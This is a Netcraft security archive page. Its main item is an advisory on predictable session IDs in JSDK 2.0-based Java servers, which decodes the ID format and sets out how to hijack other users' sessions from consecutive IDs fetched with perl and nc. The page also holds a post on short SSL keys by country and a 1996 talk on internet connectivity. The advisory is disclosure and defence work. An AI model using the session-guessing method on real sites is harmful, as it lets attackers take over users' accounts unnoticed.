Security Advisory 2001-01.1 - Predictable Session IDs
1st January, 2003
Vulnerable Products: |
Java Application Servers based on Sun's reference implementation of the Java Servlet Developers Kit (JSDK 2.0), without enhancements to the session management code, may be vulnerable. The following products are affected:
|
Not Vulnerable: |
Products based on JSDK V2.1 (onward), which uses a different algorithm, or products that conform to the 2.x Java Servlet API but use custom session management code. |
Impact: |
Hijacking of user sessions |
Affects: |
Websites using vulnerable products as stated above |
Revision history: |
Released to Vendors: 6th November 2000 |
Overview
Many websites support the idea of user sessions - each user connecting to the site is issued with a unique session ID, which is then used to identify all subsequent requests made by that user, either encoded in the URLs, or as a cookie. The server can then store data for each user session, for instance the state of a web shopping cart. Session IDs are also often used to control access to sites requiring a login; instead of sending the username/password with every request, the site issues a session ID after the user logs on, which identifies the user for the rest of the session.
With some server session management systems, it is possible for a user who can connect to the server and get a session ID, to guess other users' session IDs. If successful, the attacker can then view any page, take any action, post to any form etc, that the real user of that session could.
This attack requires no IP spoofing or session snooping. It works against sites using SSL. Netcraft has successfully proven this attack against machines using cookie-based and URL rewriting-based session management.
Details
From a security point of view, the important properties of a session ID should be that it is unique, and it is not possible for one user to guess another user's session ID.
One way to ensure uniqueness is to include a session counter or timestamp in the session ID. In particular, for the sites we found to be vulnerable, the session ID included:
- A session counter
- The IP address of the server
- A value made by combining the date, session counter, and current system time in milliseconds (we'll call this the timestamp)
This certainly appears sufficient to ensure uniqueness. However, if one user can get this information out of his session ID, he can clearly use it to guess other users' session IDs.
Encoding of Session IDs
For servers Netcraft has identified as vulnerable, the session ID is encoded using a simple rule. 5 bits at a time are taken from the binary session ID; these 5 bits form a number between 0 and 31. Numbers 0-25 are encoded with the corresponding letters A-Z; numbers 26-31 are encoded by the digits 0-5 respectively. It's a kind of "base32" encoding - which can be decoded trivially.
Here's a typical session ID being decoded:
$ echo -n "FGAZOWQAAAK2RQFIAAAU45Q" | ./base32.pl -d 29 81 97 5a 00 00 15 c8 c0 a8 00 01 4f 7e
This breaks up as: (all integers are in network byte order)
- Bytes 0-3: Timestamp
- Bytes 4-7: Session count
- Bytes 8-11: IP address of the server issuing the session ID
- Bytes 12-13: Random number (or zero, see below)
The Attack
We now know everything we need to try to hijack another user's session. The timestamp is always increasing, the session count simply increments, and the internal server IP address is constant. If we make two requests to the server, and the session count of the second request is more than 1 higher than the session count of the first, then we know that another session has started in between. We know also that the timestamp of that session will be between our two timestamps.
The two "random bytes" might have been a stumbling block, but:
- The random bytes are not used by all servers, in which case they are zero.
- For many servers tried, the random bytes are only generated when the server is started; they are the same for all user sessions.
For example, a couple of consecutive session IDs from a website might be something like this:
$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \ nc www.example.com 80 | grep sessionid Set-cookie: sessionid=FGAZOWQAAAK2RQFIAAAU45Q;path=/ $ ./decode-sessionid.pl -s FGAZOWQAAAK2RQFIAAAU45Q SessionID gives: Thu Oct 12 12:34:06 2000, session count = 5576, IP Address = 192.168.0.1 Extra = 4f (79) 7e (126) $ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \ nc www.example.com 80 | grep sessionid Set-cookie: sessionid=FGFLIHYAAALJVQFIAAAU45Q;path=/ $ ./decode-sessionid.pl -s FGFLIHYAAALJVQFIAAAU45Q SessionID gives: Thu Oct 12 12:38:44 2000, session count = 5786, IP Address = 192.168.0.1 Extra = 4f (79) 7e (126)
Note that all session IDs in this report were obtained from real servers, but have been modified to avoid naming those servers. The name of the session ID is usually, but not always, "sessionid", "sesessionid", "JSESSIONID" or "jwssessionid".
The random extra bytes don't seem to be very random, but you do need to watch out for load-balanced servers, as each will have different counts and random elements.
Consequences
Once an attacker has guessed another user's session ID, they have full access to that user's session (assuming the session ID is the sole identifier for session management and security purposes, which it is on many sites). If the service provides a means of "logging out", then the session ID is only useful until the real user logs out. Until then you can (typically) view any page, take any action, post to any form etc, that the real user can on the site. And the real user will be unaware of this (until some action you take has a visible result to the real user). Basically, it's very bad news.
Of course, the fact that the session IDs leak your internal IP addresses and, perhaps more importantly from the business point of view, the server's session count (easy way to track the popularity of competitors' sites) is in itself a cause for concern.
Testing Vulnerability
There are a large number of servers on the Internet using session ID cookies or URL re-writing encoded in this fashion. The easiest way to identify such sites is to find a page on the site which generates a session ID (often this is either the home page, or the page which processes logins), then make a few requests to this page, and compare the session IDs, looking for the incrementing session count.
Netcraft is reluctant to give a more exact test here, because it could lead to a false sense of security for administrators whose sites don't display the behaviour described above. Netcraft has seen some variations on the basic theme (e.g. some servers have longer session IDs than those described here, but the extra data appears constant).
Recommendations
- There should be some real random input to the session IDs if they are to be used as the sole means of session tracking and management.
- Any meaningful data being used in session IDs should be one-way encrypted. You shouldn't be trusting users to play fair with this information.
Recent versions of Sun's Java servlet code (from version 2.1) use a new session ID system, which includes a large random component. However, developers building application servers should enhance the code to make the session count inaccessible.
The Apache Tomcat project, starting with Tomcat version 3.2, uses a secure random number generator, and maintains uniqueness of session IDs without leaking the session count.
Vendor Patches and Comments
ATG
Bug numbers:
Dynamo 5.1, Dynamo 5.0 Patch 2 - Bug #29826
Dynamo 4.5.1 Patch 5 - Bug #25925
Dynamo 4.1.0 Patch 9 - Bug #31956
Dynamo 4.0.1 Patch 4 - Bug #31957
Dynamo 3.5.1 Patch 8 - Bug #32277
Versions affected:
Dynamo 3.5.1, Dynamo 3.5.1 Patch 1 through 7
Dynamo 4.0.1, Dynamo 4.0.1 Patch 1 through 3
Dynamo 4.1.0, Dynamo 4.1.0 Patch 1 through 8
Dynamo 4.5.0, Dynamo 4.5.0 Patch 1 through 5
Dynamo 4.5.1, Dynamo 4.5.1 Patch 1 through 4
Dynamo 5.0, Dynamo 5.0 Patch 1
Versions not affected:
Dynamo 5.1, Dynamo 5.0 Patch 2 and all future releases
Dynamo 4.5.1 Patch 5 and all future releases
Dynamo 4.1.0 Patch 9 and all future releases
Dynamo 4.0.1 Patch 4 and all future releases
Dynamo 3.5.1 Patch 8 and all future releases
Patch location:
Available to registered users in the support area on atg.com, under "Dynamo Patches".
Dynamo 5.1, Dynamo 5.0 Patch 2, Dynamo 4.5.1 Patch 5 are available as of 20th December, 2000.
Dynamo 3.5.1 through 4.1.0 patches should be available in mid-January 2001.
IBM
"With V2.x, we have always had hooks in the HttpSession support to allow applications to associate authentication information with a session and prevent access to that session if the right credentials are not provided. For customer applications who could not do this, we earlier this year provided a V2.x patch which further 'randomizes' the session ID, using a triple DES encryption ID generation algorithm.
With V3.x, we feel we have always prevented this issue - There is built in coupling between the HttpSession and WebSphere security, where authentication is automatically associated with the session and thus is used to prevent all unauthenticated access. One can review the WebSphere documentation to review all the various means available for securely maintaining this authorization."
E-fix PQ47663 is now available for version 3.02 and 3.5.x of WebSphere. For version 2, ask WebSphere support for the "version 2 HttpSession ID randomization change".
Sun Microsystems
For Java Web Server 1.1.1 or 1.1.2, first upgrade the Java Web Server and than install the appropriate patch:
Version 2.0 Patch 4
Version 1.1.3 Patch 4
Patches available from http://www.sun.com/software/jwebserver/upgrade/index.html.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
For more information on Netcraft security services, please see http://news.netcraft.com/archives/security.html
Posted by Martyn Tovey in Security
Crypto Regulations Cast Long Shadow
11th March, 2002
Recently, the strength of SSL key lengths has been the subject of heated debate in security circles, after Nicko van Someren disclosed that he is able to break 512-bit keys in around six weeks, using conventional office computers.
The analysis focuses on the key length used for the server's public key (the key which is used to prove the authenticity of the server to web browsers). The longer the key, the harder it is for an attacker to break the key - if this key is broken, it can compromise both past and future secure browsing sessions, and allow the attacker to impersonate the server. Most experts currently recommend a key length of at least 1024 bits as secure and some of the strongest debate has concerned the perceived safety of these 1024 bit keys.
However, a more timely aspect to the work is to highlight the number of SSL servers currently in use on the internet, and their geographical location.
Although US export restrictions on strong cryptography have been relaxed in recent years, data collected as part of our SSL Server Survey shows that the US export legislation and locally acted legislation to restrict the use of cryptography in countries with repressive or eccentric administrations, does still cast a shadow over the security of ecommerce even years after the acts have been repealed.
Country | Percentage of sites with short keys |
---|---|
Canada | 13.5% |
USA | 15.1% |
UK | 26.5% |
Spain | 31.9% |
France | 41.1% |
Internet-wide, around 18% of SSL Servers use potentially vulnerable key lengths. However, these tend to be concentrated in geographical areas outside the United States and its close trading partners. In the US, where over 60% of SSL sites are situated, and Canada only around 15% of sites are using short keys. In most European countries over 25% are still using short keys, and in France, which had laws restricting the use of cryptography until relatively recently, over 40% of sites are using short keys.
US export regulations (described in detail by the crypto law survey) have had a discernable impact in slowing use of strong cryptography outside of the States. One reason export grade cryptography remains quite common is that the relative weakness of the server's choice of cryptography is not obvious to the end user, so there is so little pressure to make the change. Browser developers are in a position to help change this, perhaps by displaying a graded indication of key length rather than the present lock symbol displayed on all SSL sessions regardless of strength.
Posted in Security
Is it safe to connect your network to the Internet?
29th October, 1996
Presented at Networld + Interop London, October 1996.
What makes you think you have a choice, anyway?
The importance of making one's company accessible to the internet community is already well understood. Very few companies of any stature attempt to operate without, at the very least, a promotional presence on the web, and the ability to exchange smtp mail with the outside world.
However, what distinguishes the effectiveness of a company's relationship with the internet is the degree of integration between its internal information systems and the company's interface to external networks. The internet community become bored with purely promotional material very quickly, and require interaction with a company via the internet to be at least as effective as they might achieve by telephone, or by letter, or by visiting the offices of the company.
One example of a company trying to achieve this level of integration is Blackwells Bookshops, where the bookseller's stock control database is accessed via the website, so that the prospective purchaser can see how many copies of a book the shop has in stock. The company also uses the site to promote its Personal Accounts. With at least 300 internet bookshops, and competition from mail order and catalogue booksellers; being able to demonstrate that a book can be promptly delivered from stock, and promoting customer bonding through account facilities are cornerstones in its approach.
Another example, that has become a classic within its own industry is the Federal Express parcel tracking system. Here, people can follow the progress of their shipment by directly interrogating FedEx's tracking system through a web based interface.
Other well established business models which depend on a successful technical and cultural integration with the internet include Walnut Creek's CDROM publishing business, Jobserve's contract computer consultancy listings, and O'Reilly's book and software publishing business where prospective authors, developers and customers can all successfully interact with the company via the internet.
Eighteen months ago, companies such as these attracted considerable esteem through their activities on the internet. It was then unusual for a company to have the internet as a key part of the way in which it managed its customer relationship throughout the sales cycle, from promotion and awareness forming to pre-sales, sales support, transaction processing, and after sales support.
However, this is now becoming the norm rather than the exception. FedEx's competitors also have internet interfaces to their parcel tracking systems and many booksellers other than Blackwells are properly equipped to fulfill requirements from the internet community.
People now expect, as a matter of course, to be able to deal effectively with their suppliers via the internet, and whereas eighteen months ago, a company that was able to properly support a relationship with its customers via the internet might have been thought innovative, today a company that cannot promptly support its relationships via the internet is clearly losing the respect of its customers. Whereas people once thought well of FedEx because they offered internet based parcel tracking, people now think poorly of Parcelforce because they don't.
Hence, the question is not so much Is it safe to connect our Network to the Internet?, but We have to connect our Network to the Internet, how can we defend it?